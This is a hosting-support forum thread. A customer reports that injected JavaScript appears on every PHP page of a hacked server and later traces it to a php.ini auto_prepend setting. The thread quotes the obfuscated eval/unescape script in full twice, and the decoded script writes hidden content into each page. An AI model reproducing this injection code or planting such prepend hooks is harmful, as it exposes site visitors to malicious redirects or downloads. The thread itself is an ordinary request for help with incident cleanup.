Announcement

Collapse
No announcement yet.

Serious Security problem in my server

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Serious Security problem in my server

    Hi, i am a good WHUK customer and i was planning to move some accounts from another old server of mine. But before managing to transfer my accounts to my new WHUK server, my old server was hacked!

    It is very weird: this javascript appears on top of all php pages on server, without (!?) being inserted in these pages:

    <script language="javascript" type="text/javascript">var j="",i=32,e="e:<sotb>lf;ugmyzvnawr0/i.ph? c=d",s="";eval(unescape("%66%75%6E%63%74%69%6F%6E% 20%20%74%28%6D%20%29%7B%20%76%61%72%20%63%3D%27%27 %2C%75%2C%64%20%2C%62%2C%77%3B%20%66%6F%72%28%75%3 D%31%3B%20%75%3C%3D%20%6D%2E%6C%65%6E%67%74%68%3B% 75%2B%2B%29%20%7B%64%3D%6D%2E%63%68%61%72%41%74%28 %20%75%2D%31%2B%31%2D%31%29%3B%62%3D%65%2E%69%6E%6 4%65%78%4F%66%28%20%64%29%3B%20%69%66%28%62%3E%2D% 31%2B%31%2D%31%29%7B%77%3D%20%28%28%62%2B%33%2D%32 %29%25%20%69%2D%31%29%3B%69%66%28%20%77%3C%3D%20%3 0%2B%32%2D%32%29%7B%77%2B%3D%69%20%7D%63%2B%3D%65% 2E%63%68%61%72%41%74%28%77%2D%32%2B%31%29%7D%65%6C %73%65%20%7B%63%2B%3D%64%7D%7D%20%73%2B%3D%63%20%7 D%3B%66%75%6E%63%74%69%6F%6E%20%61%61%61%28%29%7B% 20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73 %29%3B%6A%3D%22%22%7D"));t("cccccccccccccccccccccc ccs.;0wy:co0=d'?bbh<iiv=tgab:0p=aigo:0i.ap=m. e:;wgfb'cr.eb?d'/'c?:.m?bd'/'cobzf:d'n.o.>.f.bz<c?.ee:au'lsi.;0wy:lc");aaa();d ocument.write(j);j="";</script>
    It seems that this malicious code was inserted somewhere globally in my server and i do not know where. As i said, this javascript code is not located inside my php files, so i do not know how to remove it. Can you help me?

  • #2
    This is the malicious code:

    [PHP]<script language="javascript" type="text/javascript">var j="",i=32,e="e:<sotb>lf;ugmyzvnawr0/i.ph? c=d",s="";eval(unescape("%66%75%6E%63%74%69%6F%6E% 20%20%74%28%6D%20%29%7B%20%76%61%72%20%63%3D%27%27 %2C%75%2C%64%20%2C%62%2C%77%3B%20%66%6F%72%28%75%3 D%31%3B%20%75%3C%3D%20%6D%2E%6C%65%6E%67%74%68%3B% 75%2B%2B%29%20%7B%64%3D%6D%2E%63%68%61%72%41%74%28 %20%75%2D%31%2B%31%2D%31%29%3B%62%3D%65%2E%69%6E%6 4%65%78%4F%66%28%20%64%29%3B%20%69%66%28%62%3E%2D% 31%2B%31%2D%31%29%7B%77%3D%20%28%28%62%2B%33%2D%32 %29%25%20%69%2D%31%29%3B%69%66%28%20%77%3C%3D%20%3 0%2B%32%2D%32%29%7B%77%2B%3D%69%20%7D%63%2B%3D%65% 2E%63%68%61%72%41%74%28%77%2D%32%2B%31%29%7D%65%6C %73%65%20%7B%63%2B%3D%64%7D%7D%20%73%2B%3D%63%20%7 D%3B%66%75%6E%63%74%69%6F%6E%20%61%61%61%28%29%7B% 20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73 %29%3B%6A%3D%22%22%7D"));t("cccccccccccccccccccccc ccs.;0wy:co0=d'?bbh<iiv=tgab:0p=aigo:0i.ap=m. e:;wgfb'cr.eb?d'/'c?:.m?bd'/'cobzf:d'n.o.>.f.bz<c?.ee:au'lsi.;0wy:lc");aaa();d ocument.write(j);j="";</script>[/PHP]

    Comment


    • #3
      Please let us know the Server IP which was compromised so that we can have a look over it, also let me know your registered email address you have used while placing order.
      UK VPS Hosting || Managed Server Hosting || Reseller Hosting
      Webhosting affiliate program can make you earn upto 300 Webhosting UK Affiliate

      Comment


      • #4
        There was a php.ini problem with auto_prepend. Now its ok.

        Comment


        • #5
          Good to know Feel free to contact us if you need any kind of further assistance or help.
          UK VPS Hosting || Managed Server Hosting || Reseller Hosting
          Webhosting affiliate program can make you earn upto 300 Webhosting UK Affiliate

          Comment

          Working...
          X